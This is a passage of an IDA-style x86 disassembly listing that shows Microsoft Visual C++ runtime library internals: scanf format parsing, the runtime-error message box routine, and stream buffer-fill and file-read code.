loc_409486: ; CODE XREF: J8@F_7_S:00409480�j
; J8@F_7_S:0040968A�j
dec dword ptr [ebp+4]
cmp dword ptr [ebp-4], 0FFFFFFFFh
mov edi, esi
jz short loc_40949E
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_40949E: ; CODE XREF: J8@F_7_S:0040948F�j
; J8@F_7_S:0040974D�j ...
cmp dword ptr [ebp-2Ch], 0
jz short loc_4094B2
mov eax, [ebp-0Ch]
dec dword ptr [ebp-0Ch]
test eax, eax
jz loc_40976B
loc_4094B2: ; CODE XREF: J8@F_7_S:004094A2�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp eax, 0FFFFFFFFh
mov [ebp-4], eax
jz loc_409758
cmp ebx, 63h
jz short loc_409517
cmp ebx, 73h
jnz short loc_4094E6
cmp eax, 9
jl short loc_4094E1
cmp eax, 0Dh
jle loc_409758
loc_4094E1: ; CODE XREF: J8@F_7_S:004094D6�j
cmp eax, 20h
jnz short loc_409517
loc_4094E6: ; CODE XREF: J8@F_7_S:004094D1�j
cmp ebx, 7Bh
jnz loc_409758
movsx ebx, byte ptr [ebp-18h]
xor edx, edx
mov ecx, eax
and ecx, 7
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, byte ptr [ebp+ecx+168h]
xor ecx, ebx
test edx, ecx
mov ebx, [ebp-20h]
jz loc_409758
loc_409517: ; CODE XREF: J8@F_7_S:004094CC�j
; J8@F_7_S:004094E4�j
cmp byte ptr [ebp-0Dh], 0
jnz loc_409752
cmp byte ptr [ebp-16h], 0
jz loc_409747
mov [ebp-50h], al
movzx eax, al
push eax
call sub_40CA36
test eax, eax
pop ecx
jz short loc_40954A
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov [ebp-4Fh], al
loc_40954A: ; CODE XREF: J8@F_7_S:0040953A�j
lea eax, [ebp-6Ch]
push eax
mov eax, [ebp-6Ch]
mov dword ptr [ebp-5Ch], 3Fh
push dword ptr [eax+0ACh]
lea eax, [ebp-50h]
push eax
lea eax, [ebp-5Ch]
push eax
call sub_40F3BD
mov ax, [ebp-5Ch]
add esp, 10h
mov [esi], ax
inc esi
inc esi
jmp loc_40974A
; ---------------------------------------------------------------------------
loc_40957C: ; CODE XREF: J8@F_7_S:00409173�j
mov eax, ebx
sub eax, 70h
jz loc_4097A3
sub eax, 3
jz loc_40947C
dec eax
dec eax
jz loc_4097A7
sub eax, 3
jz loc_4091C1
sub eax, 3
jz short loc_4095CA
loc_4095A6: ; CODE XREF: J8@F_7_S:00409193�j
; J8@F_7_S:004091A6�j
movzx eax, byte ptr [edi]
cmp eax, [ebp-4]
jnz loc_409A31
dec byte ptr [ebp-15h]
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
mov eax, [ebp-70h]
mov [ebp-58h], eax
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4095CA: ; CODE XREF: J8@F_7_S:004095A4�j
cmp byte ptr [ebp-5], 0
jle short loc_4095D4
mov byte ptr [ebp-16h], 1
loc_4095D4: ; CODE XREF: J8@F_7_S:004095CE�j
inc edi
cmp byte ptr [edi], 5Eh
mov esi, edi
jnz short loc_4095E3
lea esi, [edi+1]
mov byte ptr [ebp-18h], 0FFh
loc_4095E3: ; CODE XREF: J8@F_7_S:004095DA�j
push 20h
lea eax, [ebp+168h]
push 0
push eax
call sub_407B70
add esp, 0Ch
cmp byte ptr [esi], 5Dh
jnz short loc_409607
mov dl, 5Dh
inc esi
mov byte ptr [ebp+173h], 20h
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_409607: ; CODE XREF: J8@F_7_S:004095F9�j
mov dl, [ebp-3Dh]
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_40960C: ; CODE XREF: J8@F_7_S:0040967A�j
inc esi
cmp al, 2Dh
jnz short loc_409659
test dl, dl
jz short loc_409659
mov cl, [esi]
cmp cl, 5Dh
jz short loc_409659
inc esi
cmp dl, cl
jnb short loc_409625
mov al, cl
jmp short loc_409629
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: J8@F_7_S:0040961F�j
mov al, dl
mov dl, cl
loc_409629: ; CODE XREF: J8@F_7_S:00409623�j
cmp dl, al
ja short loc_409655
sub al, dl
inc al
movzx edi, dl
movzx edx, al
loc_409637: ; CODE XREF: J8@F_7_S:00409650�j
mov ecx, edi
and ecx, 7
mov eax, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+168h]
or [eax], bl
inc edi
dec edx
jnz short loc_409637
mov ebx, [ebp-20h]
loc_409655: ; CODE XREF: J8@F_7_S:0040962B�j
xor dl, dl
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_409659: ; CODE XREF: J8@F_7_S:0040960F�j
; J8@F_7_S:00409613�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+168h]
or [eax], bl
mov ebx, [ebp-20h]
loc_409676: ; CODE XREF: J8@F_7_S:00409605�j
; J8@F_7_S:0040960A�j ...
mov al, [esi]
cmp al, 5Dh
jnz short loc_40960C
test al, al
jz loc_409A59
mov [ebp-28h], esi
mov esi, [ebp-38h]
jmp loc_409486
; ---------------------------------------------------------------------------
loc_40968F: ; CODE XREF: J8@F_7_S:004091C7�j
cmp ebx, 2Bh
jnz short loc_4096B3
loc_409694: ; CODE XREF: J8@F_7_S:004091D1�j
dec dword ptr [ebp-0Ch]
jnz short loc_4096A3
test ecx, ecx
jz short loc_4096A3
mov byte ptr [ebp+3], 1
jmp short loc_4096B3
; ---------------------------------------------------------------------------
loc_4096A3: ; CODE XREF: J8@F_7_S:00409697�j
; J8@F_7_S:0040969B�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
loc_4096B3: ; CODE XREF: J8@F_7_S:00409692�j
; J8@F_7_S:004096A1�j
cmp ebx, 30h
jnz loc_4097D9
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
cmp bl, 78h
mov [ebp-4], ebx
jz short loc_409718
cmp bl, 58h
jz short loc_409718
cmp dword ptr [ebp-20h], 78h
mov dword ptr [ebp-1Ch], 1
jz short loc_4096FD
cmp dword ptr [ebp-2Ch], 0
jz short loc_4096F1
dec dword ptr [ebp-0Ch]
jnz short loc_4096F1
inc byte ptr [ebp+3]
loc_4096F1: ; CODE XREF: J8@F_7_S:004096E7�j
; J8@F_7_S:004096EC�j
mov dword ptr [ebp-20h], 6Fh
jmp loc_4097D9
; ---------------------------------------------------------------------------
loc_4096FD: ; CODE XREF: J8@F_7_S:004096E1�j
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_409710
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_409710: ; CODE XREF: J8@F_7_S:00409703�j
push 30h
pop ebx
jmp loc_4097D6
; ---------------------------------------------------------------------------
loc_409718: ; CODE XREF: J8@F_7_S:004096CF�j
; J8@F_7_S:004096D4�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
cmp dword ptr [ebp-2Ch], 0
mov ebx, eax
mov [ebp-4], ebx
jz short loc_40973B
sub dword ptr [ebp-0Ch], 2
cmp dword ptr [ebp-0Ch], 1
jge short loc_40973B
inc byte ptr [ebp+3]
loc_40973B: ; CODE XREF: J8@F_7_S:0040972C�j
; J8@F_7_S:00409736�j
mov dword ptr [ebp-20h], 78h
jmp loc_4097D9
; ---------------------------------------------------------------------------
loc_409747: ; CODE XREF: J8@F_7_S:00409525�j
mov [esi], al
inc esi
loc_40974A: ; CODE XREF: J8@F_7_S:00409577�j
mov [ebp-38h], esi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409752: ; CODE XREF: J8@F_7_S:0040951B�j
inc edi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409758: ; CODE XREF: J8@F_7_S:004094C3�j
; J8@F_7_S:004094DB�j ...
dec dword ptr [ebp+4]
cmp eax, 0FFFFFFFFh
jz short loc_40976B
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_40976B: ; CODE XREF: J8@F_7_S:004094AC�j
; J8@F_7_S:0040975E�j
cmp edi, esi
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz loc_4099C1
inc dword ptr [ebp-3Ch]
cmp ebx, 63h
jz loc_4099C1
cmp byte ptr [ebp-16h], 0
mov eax, [ebp-38h]
jz short loc_40979B
and word ptr [eax], 0
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_40979B: ; CODE XREF: J8@F_7_S:00409790�j
mov byte ptr [eax], 0
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4097A3: ; CODE XREF: J8@F_7_S:00409581�j
mov byte ptr [ebp-0Eh], 1
loc_4097A7: ; CODE XREF: J8@F_7_S:00409179�j
; J8@F_7_S:0040918D�j ...
mov ebx, [ebp-4]
cmp ebx, 2Dh
jnz short loc_4097B5
mov byte ptr [ebp-17h], 1
jmp short loc_4097BA
; ---------------------------------------------------------------------------
loc_4097B5: ; CODE XREF: J8@F_7_S:004097AD�j
cmp ebx, 2Bh
jnz short loc_4097D9
loc_4097BA: ; CODE XREF: J8@F_7_S:004097B3�j
dec dword ptr [ebp-0Ch]
jnz short loc_4097C9
test ecx, ecx
jz short loc_4097C9
mov byte ptr [ebp+3], 1
jmp short loc_4097D9
; ---------------------------------------------------------------------------
loc_4097C9: ; CODE XREF: J8@F_7_S:004097BD�j
; J8@F_7_S:004097C1�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
loc_4097D6: ; CODE XREF: J8@F_7_S:00409713�j
mov [ebp-4], ebx
loc_4097D9: ; CODE XREF: J8@F_7_S:004096B6�j
; J8@F_7_S:004096F8�j ...
cmp dword ptr [ebp-48h], 0
jz loc_4098DE
cmp byte ptr [ebp+3], 0
jnz loc_4098B9
loc_4097ED: ; CODE XREF: J8@F_7_S:004098A1�j
cmp dword ptr [ebp-20h], 78h
jz short loc_409842
cmp dword ptr [ebp-20h], 70h
jz short loc_409842
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz loc_4098A6
cmp dword ptr [ebp-20h], 6Fh
jnz short loc_40982C
cmp ebx, 38h
jge loc_4098A6
mov eax, [ebp-30h]
mov esi, [ebp-34h]
shld eax, esi, 3
shl esi, 3
mov [ebp-30h], eax
jmp short loc_409877
; ---------------------------------------------------------------------------
loc_40982C: ; CODE XREF: J8@F_7_S:0040980F�j
push 0
push 0Ah
push dword ptr [ebp-30h]
push dword ptr [ebp-34h]
call sub_40F4F0
mov esi, eax
mov [ebp-30h], edx
jmp short loc_409877
; ---------------------------------------------------------------------------
loc_409842: ; CODE XREF: J8@F_7_S:004097F1�j
; J8@F_7_S:004097F7�j
movzx edi, bl
push edi
call sub_40F1FC
test eax, eax
pop ecx
jz short loc_4098A6
mov eax, [ebp-30h]
mov esi, [ebp-34h]
shld eax, esi, 4
push edi
shl esi, 4
mov [ebp-30h], eax
call sub_40F17F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_409874
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_409874: ; CODE XREF: J8@F_7_S:0040986C�j
mov [ebp-4], ebx
loc_409877: ; CODE XREF: J8@F_7_S:0040982A�j
; J8@F_7_S:00409840�j
inc dword ptr [ebp-1Ch]
lea eax, [ebx-30h]
cdq
add esi, eax
adc [ebp-30h], edx
cmp dword ptr [ebp-2Ch], 0
mov [ebp-34h], esi
jz short loc_409891
dec dword ptr [ebp-0Ch]
jz short loc_4098B9
loc_409891: ; CODE XREF: J8@F_7_S:0040988A�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
jmp loc_4097ED
; ---------------------------------------------------------------------------
loc_4098A6: ; CODE XREF: J8@F_7_S:00409805�j
; J8@F_7_S:00409814�j ...
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_4098B9
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_4098B9: ; CODE XREF: J8@F_7_S:004097E7�j
; J8@F_7_S:0040988F�j ...
cmp byte ptr [ebp-17h], 0
mov edi, [ebp-54h]
jz loc_409981
mov eax, [ebp-34h]
mov ecx, [ebp-30h]
neg eax
adc ecx, 0
neg ecx
mov [ebp-34h], eax
mov [ebp-30h], ecx
jmp loc_409981
; ---------------------------------------------------------------------------
loc_4098DE: ; CODE XREF: J8@F_7_S:004097DD�j
cmp byte ptr [ebp+3], 0
mov edi, [ebp-54h]
jnz loc_409979
loc_4098EB: ; CODE XREF: J8@F_7_S:00409964�j
cmp dword ptr [ebp-20h], 78h
jz short loc_40991A
cmp dword ptr [ebp-20h], 70h
jz short loc_40991A
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz short loc_409966
cmp dword ptr [ebp-20h], 6Fh
jnz short loc_409915
cmp ebx, 38h
jge short loc_409966
shl edi, 3
jmp short loc_409942
; ---------------------------------------------------------------------------
loc_409915: ; CODE XREF: J8@F_7_S:00409909�j
imul edi, 0Ah
jmp short loc_409942
; ---------------------------------------------------------------------------
loc_40991A: ; CODE XREF: J8@F_7_S:004098EF�j
; J8@F_7_S:004098F5�j
movzx esi, bl
push esi
call sub_40F1FC
test eax, eax
pop ecx
jz short loc_409966
push esi
shl edi, 4
call sub_40F17F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_40993F
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_40993F: ; CODE XREF: J8@F_7_S:00409937�j
mov [ebp-4], ebx
loc_409942: ; CODE XREF: J8@F_7_S:00409913�j
; J8@F_7_S:00409918�j
inc dword ptr [ebp-1Ch]
cmp dword ptr [ebp-2Ch], 0
lea edi, [edi+ebx-30h]
jz short loc_409954
dec dword ptr [ebp-0Ch]
jz short loc_409979
loc_409954: ; CODE XREF: J8@F_7_S:0040994D�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
mov [ebp-4], ebx
jmp short loc_4098EB
; ---------------------------------------------------------------------------
loc_409966: ; CODE XREF: J8@F_7_S:00409903�j
; J8@F_7_S:0040990E�j ...
dec dword ptr [ebp+4]
cmp ebx, 0FFFFFFFFh
jz short loc_409979
push dword ptr [ebp-14h]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_409979: ; CODE XREF: J8@F_7_S:004098E5�j
; J8@F_7_S:00409952�j ...
cmp byte ptr [ebp-17h], 0
jz short loc_409981
neg edi
loc_409981: ; CODE XREF: J8@F_7_S:004098C0�j
; J8@F_7_S:004098D9�j ...
cmp dword ptr [ebp-20h], 46h
jnz short loc_40998B
and dword ptr [ebp-1Ch], 0
loc_40998B: ; CODE XREF: J8@F_7_S:00409985�j
cmp dword ptr [ebp-1Ch], 0
jz loc_409A59
cmp byte ptr [ebp-0Dh], 0
jnz short loc_4099C1
inc dword ptr [ebp-3Ch]
mov esi, [ebp-38h]
loc_4099A1: ; CODE XREF: J8@F_7_S:004091B3�j
cmp dword ptr [ebp-48h], 0
jz short loc_4099B4
mov eax, [ebp-34h]
mov [esi], eax
mov eax, [ebp-30h]
mov [esi+4], eax
jmp short loc_4099C1
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: J8@F_7_S:004099A5�j
cmp byte ptr [ebp-0Eh], 0
jz short loc_4099BE
mov [esi], edi
jmp short loc_4099C1
; ---------------------------------------------------------------------------
loc_4099BE: ; CODE XREF: J8@F_7_S:004099B8�j
mov [esi], di
loc_4099C1: ; CODE XREF: J8@F_7_S:004091B9�j
; J8@F_7_S:0040943A�j ...
mov edi, [ebp-28h]
inc byte ptr [ebp-15h]
inc edi
mov [ebp-28h], edi
jmp short loc_409A0F
; ---------------------------------------------------------------------------
loc_4099CD: ; CODE XREF: J8@F_7_S:00408FE3�j
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
mov ebx, eax
movzx eax, byte ptr [edi]
inc edi
cmp eax, ebx
mov [ebp-4], ebx
mov [ebp-28h], edi
jnz short loc_409A47
movzx eax, bl
push eax
call sub_40CA36
test eax, eax
pop ecx
jz short loc_409A0F
mov edx, [ebp-14h]
inc dword ptr [ebp+4]
call sub_408E2C
movzx ecx, byte ptr [edi]
inc edi
cmp ecx, eax
mov [ebp-28h], edi
jnz short loc_409A37
dec dword ptr [ebp+4]
loc_409A0F: ; CODE XREF: J8@F_7_S:004099CB�j
; J8@F_7_S:004099F4�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jnz short loc_409A25
cmp byte ptr [edi], 25h
jnz short loc_409A59
mov eax, [ebp-28h]
cmp byte ptr [eax+1], 6Eh
jnz short loc_409A59
mov edi, eax
loc_409A25: ; CODE XREF: J8@F_7_S:00408FDB�j
; J8@F_7_S:00409A13�j
mov al, [edi]
test al, al
jnz loc_408F9F
jmp short loc_409A59
; ---------------------------------------------------------------------------
loc_409A31: ; CODE XREF: J8@F_7_S:0040916A�j
; J8@F_7_S:004095AC�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jmp short loc_409A4A
; ---------------------------------------------------------------------------
loc_409A37: ; CODE XREF: J8@F_7_S:00409A0A�j
cmp eax, 0FFFFFFFFh
jz short loc_409A47
push dword ptr [ebp-14h]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_409A47: ; CODE XREF: J8@F_7_S:004099E6�j
; J8@F_7_S:00409A3A�j
cmp ebx, 0FFFFFFFFh
loc_409A4A: ; CODE XREF: J8@F_7_S:00409A35�j
jz short loc_409A59
push dword ptr [ebp-14h]
push dword ptr [ebp-4]
call sub_40F29F
pop ecx
pop ecx
loc_409A59: ; CODE XREF: J8@F_7_S:00409153�j
; J8@F_7_S:0040923E�j ...
cmp dword ptr [ebp-44h], 1
jnz short loc_409A68
push dword ptr [ebp-24h]
call sub_403603
pop ecx
loc_409A68: ; CODE XREF: J8@F_7_S:00409A5D�j
cmp dword ptr [ebp-4], 0FFFFFFFFh
jnz short loc_409A8C
mov eax, [ebp-3Ch]
test eax, eax
jnz short loc_409A7D
cmp [ebp-15h], al
jnz short loc_409A7D
or eax, 0FFFFFFFFh
loc_409A7D: ; CODE XREF: J8@F_7_S:00409A73�j
; J8@F_7_S:00409A78�j
cmp byte ptr [ebp-60h], 0
jz short loc_409A9C
mov ecx, [ebp-64h]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_409A9C
; ---------------------------------------------------------------------------
loc_409A8C: ; CODE XREF: J8@F_7_S:00408F96�j
; J8@F_7_S:00409A6C�j
cmp byte ptr [ebp-60h], 0
jz short loc_409A99
mov eax, [ebp-64h]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_409A99: ; CODE XREF: J8@F_7_S:00409A90�j
mov eax, [ebp-3Ch]
loc_409A9C: ; CODE XREF: J8@F_7_S:00408ED7�j
; J8@F_7_S:00409A81�j ...
mov ecx, [ebp+188h]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 18Ch
leave
retn
; =============== S U B R O U T I N E =======================================
sub_409AB4 proc near ; CODE XREF: sub_4036E0+2A�p
; sub_403ED3+12�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
xor esi, esi
xor edi, edi
loc_409AC0: ; CODE XREF: sub_409AB4+19�j
cmp ebx, ds:dword_423C00[edi*8]
jz short loc_409ACF
inc edi
cmp edi, 17h
jl short loc_409AC0
loc_409ACF: ; CODE XREF: sub_409AB4+13�j
cmp edi, 17h
jnb loc_409C4F
push ebp
push 3
call sub_40F6C2
cmp eax, 1
pop ecx
jz loc_409C1B
push 3
call sub_40F6C2
test eax, eax
pop ecx
jnz short loc_409B03
cmp ds:dword_423050, 1
jz loc_409C1B
loc_409B03: ; CODE XREF: sub_409AB4+40�j
cmp ebx, 0FCh
jz loc_409C4E
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
mov ebx, 314h
push ebx
mov ebp, offset dword_425FD8
push ebp
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_409B39
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409B39: ; CODE XREF: sub_409AB4+76�j
push 104h
mov esi, offset byte_425FF1
push esi
push 0
mov ds:byte_4260F5, 0
call ds:dword_41D060
test eax, eax
jnz short loc_409B7D
push offset aProgramNameUnk ; "<program name unknown>"
push 2FBh
push esi
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_409B7D
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402E3D
add esp, 14h
loc_409B7D: ; CODE XREF: sub_409AB4+A1�j
; sub_409AB4+B8�j
push esi
call sub_404130
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_409BC2
push esi
call sub_404130
sub esi, 3Bh
add eax, esi
push 3
mov ecx, offset dword_4262EC
push offset a___ ; "..."
sub ecx, eax
push ecx
push eax
call sub_40C846
add esp, 14h
test eax, eax
jz short loc_409BC2
xor esi, esi
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
jmp short loc_409BC4
; ---------------------------------------------------------------------------
loc_409BC2: ; CODE XREF: sub_409AB4+D4�j
; sub_409AB4+FB�j
xor esi, esi
loc_409BC4: ; CODE XREF: sub_409AB4+10C�j
push offset asc_41DB10 ; "\n\n"
push ebx
push ebp
call sub_40C78D
add esp, 0Ch
test eax, eax
jz short loc_409BE4
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409BE4: ; CODE XREF: sub_409AB4+121�j
push ds:off_423C04[edi*8]
push ebx
push ebp
call sub_40C78D
add esp, 0Ch
test eax, eax
jz short loc_409C06
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409C06: ; CODE XREF: sub_409AB4+143�j
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebp
call sub_40F524
add esp, 0Ch
jmp short loc_409C4E
; ---------------------------------------------------------------------------
loc_409C1B: ; CODE XREF: sub_409AB4+30�j
; sub_409AB4+49�j
push 0FFFFFFF4h
call ds:dword_41D14C
mov ebp, eax
cmp ebp, esi
jz short loc_409C4E
cmp ebp, 0FFFFFFFFh
jz short loc_409C4E
push 0
lea eax, [esp+18h+var_4]
push eax
lea esi, ds:423C04h[edi*8]
push dword ptr [esi]
call sub_404130
pop ecx
push eax
push dword ptr [esi]
push ebp
call ds:dword_41D088
loc_409C4E: ; CODE XREF: sub_409AB4+55�j
; sub_409AB4+165�j ...
pop ebp
loc_409C4F: ; CODE XREF: sub_409AB4+1E�j
pop edi
pop esi
pop ebx
pop ecx
retn
sub_409AB4 endp
; =============== S U B R O U T I N E =======================================
sub_409C54 proc near ; CODE XREF: sub_4036E0+23�p
; sub_403ED3+9�p ...
push 3
call sub_40F6C2
cmp eax, 1
pop ecx
jz short loc_409C76
push 3
call sub_40F6C2
test eax, eax
pop ecx
jnz short locret_409C8C
cmp ds:dword_423050, 1
jnz short locret_409C8C
loc_409C76: ; CODE XREF: sub_409C54+B�j
push 0FCh
call sub_409AB4
push 0FFh
call sub_409AB4
pop ecx
pop ecx
locret_409C8C: ; CODE XREF: sub_409C54+17�j
; sub_409C54+20�j
retn
sub_409C54 endp
; =============== S U B R O U T I N E =======================================
sub_409C8D proc near ; CODE XREF: sub_403B22+ED�p
; sub_408E2C+F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_409CB6
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp loc_409DA7
; ---------------------------------------------------------------------------
loc_409CB6: ; CODE XREF: sub_409C8D+A�j
mov eax, [esi+0Ch]
test al, 83h
jz loc_409DA7
test al, 40h
jnz loc_409DA7
test al, 2
jz short loc_409CD8
or eax, 20h
mov [esi+0Ch], eax
jmp loc_409DA7
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409C8D+3E�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_409CED
push esi
call sub_40D4FC
pop ecx
jmp short loc_409CF2
; ---------------------------------------------------------------------------
loc_409CED: ; CODE XREF: sub_409C8D+55�j
mov eax, [esi+8]
mov [esi], eax
loc_409CF2: ; CODE XREF: sub_409C8D+5E�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push esi
call sub_408A20
pop ecx
push eax
call sub_40A34F
add esp, 0Ch
cmp eax, edi
mov [esi+4], eax
jz loc_409D97
cmp eax, 0FFFFFFFFh
jz short loc_409D97
test byte ptr [esi+0Ch], 82h
jnz short loc_409D6D
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_409D58
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_409D58
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_409D5D
; ---------------------------------------------------------------------------
loc_409D58: ; CODE XREF: sub_409C8D+9B�j
; sub_409C8D+A7�j
mov eax, offset dword_423BD0
loc_409D5D: ; CODE XREF: sub_409C8D+C9�j
mov al, [eax+4]
and al, 82h
cmp al, 82h
jnz short loc_409D6D
or dword ptr [esi+0Ch], 2000h
loc_409D6D: ; CODE XREF: sub_409C8D+8F�j
; sub_409C8D+D7�j
cmp dword ptr [esi+18h], 200h
jnz short loc_409D8A
mov eax, [esi+0Ch]
test al, 8
jz short loc_409D8A
test ax, 400h
jnz short loc_409D8A
mov dword ptr [esi+18h], 1000h
loc_409D8A: ; CODE XREF: sub_409C8D+E7�j
; sub_409C8D+EE�j ...
mov ecx, [esi]
dec dword ptr [esi+4]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_409DAA
; ---------------------------------------------------------------------------
loc_409D97: ; CODE XREF: sub_409C8D+80�j
; sub_409C8D+89�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
mov [esi+4], edi
loc_409DA7: ; CODE XREF: sub_409C8D+24�j
; sub_409C8D+2E�j ...
or eax, 0FFFFFFFFh
loc_409DAA: ; CODE XREF: sub_409C8D+108�j
pop edi
pop esi
retn
sub_409C8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409DAD proc near ; CODE XREF: sub_40A34F+9A�p
; sub_40E072+355�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = word ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
mov edx, [ebp+arg_8]
push esi
mov esi, [ebp+arg_0]
push 0FFFFFFFEh
pop eax
cmp esi, eax
mov [ebp+var_14], eax
mov [ebp+var_1C], edx
jnz short loc_409DE2
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
jmp loc_40A34C
; ---------------------------------------------------------------------------
loc_409DE2: ; CODE XREF: sub_409DAD+18�j
push edi
xor edi, edi
cmp esi, edi
jl short loc_409DF1
cmp esi, ds:dword_433C84
jb short loc_409E18
loc_409DF1: ; CODE XREF: sub_409DAD+3A�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 9
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_40A34B
; ---------------------------------------------------------------------------
loc_409E18: ; CODE XREF: sub_409DAD+42�j
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
push ebx
lea ebx, ds:433CA0h[eax*4]
mov eax, [ebx]
add eax, esi
mov cl, [eax+4]
test cl, 1
jnz short loc_409E4E
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
jmp loc_409F95
; ---------------------------------------------------------------------------
loc_409E4E: ; CODE XREF: sub_409DAD+88�j
cmp edx, edi
mov [ebp+var_10], edi
jz loc_40A348
test cl, 2
jnz loc_40A348
mov ecx, [ebp+arg_4]
cmp ecx, edi
jz loc_409F83
mov al, [eax+24h]
add al, al
sar al, 1
mov [ebp+var_2], al
movsx eax, al
dec eax
jz loc_409F7B
dec eax
jnz short loc_409E96
mov eax, edx
not eax
test al, 1
jz loc_409F83
and edx, 0FFFFFFFEh
mov [ebp+arg_8], edx
loc_409E96: ; CODE XREF: sub_409DAD+D5�j
mov [ebp+var_C], ecx
loc_409E99: ; CODE XREF: sub_409DAD+216�j
mov ecx, [ebx]
mov eax, [ebp+var_C]
lea edi, [esi+ecx]
test byte ptr [edi+4], 48h
jz short loc_409F1D
mov cl, [edi+5]
cmp cl, 0Ah
jz short loc_409F1D
xor edx, edx
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
dec [ebp+arg_8]
cmp [ebp+var_2], dl
mov [ebp+var_10], 1
mov byte ptr [esi+ecx+5], 0Ah
jz short loc_409F1D
mov ecx, [ebx]
mov cl, [esi+ecx+25h]
cmp cl, 0Ah
jz short loc_409F1D
cmp [ebp+arg_8], edx
jz short loc_409F1D
mov [eax], cl
mov ecx, [ebx]
inc eax
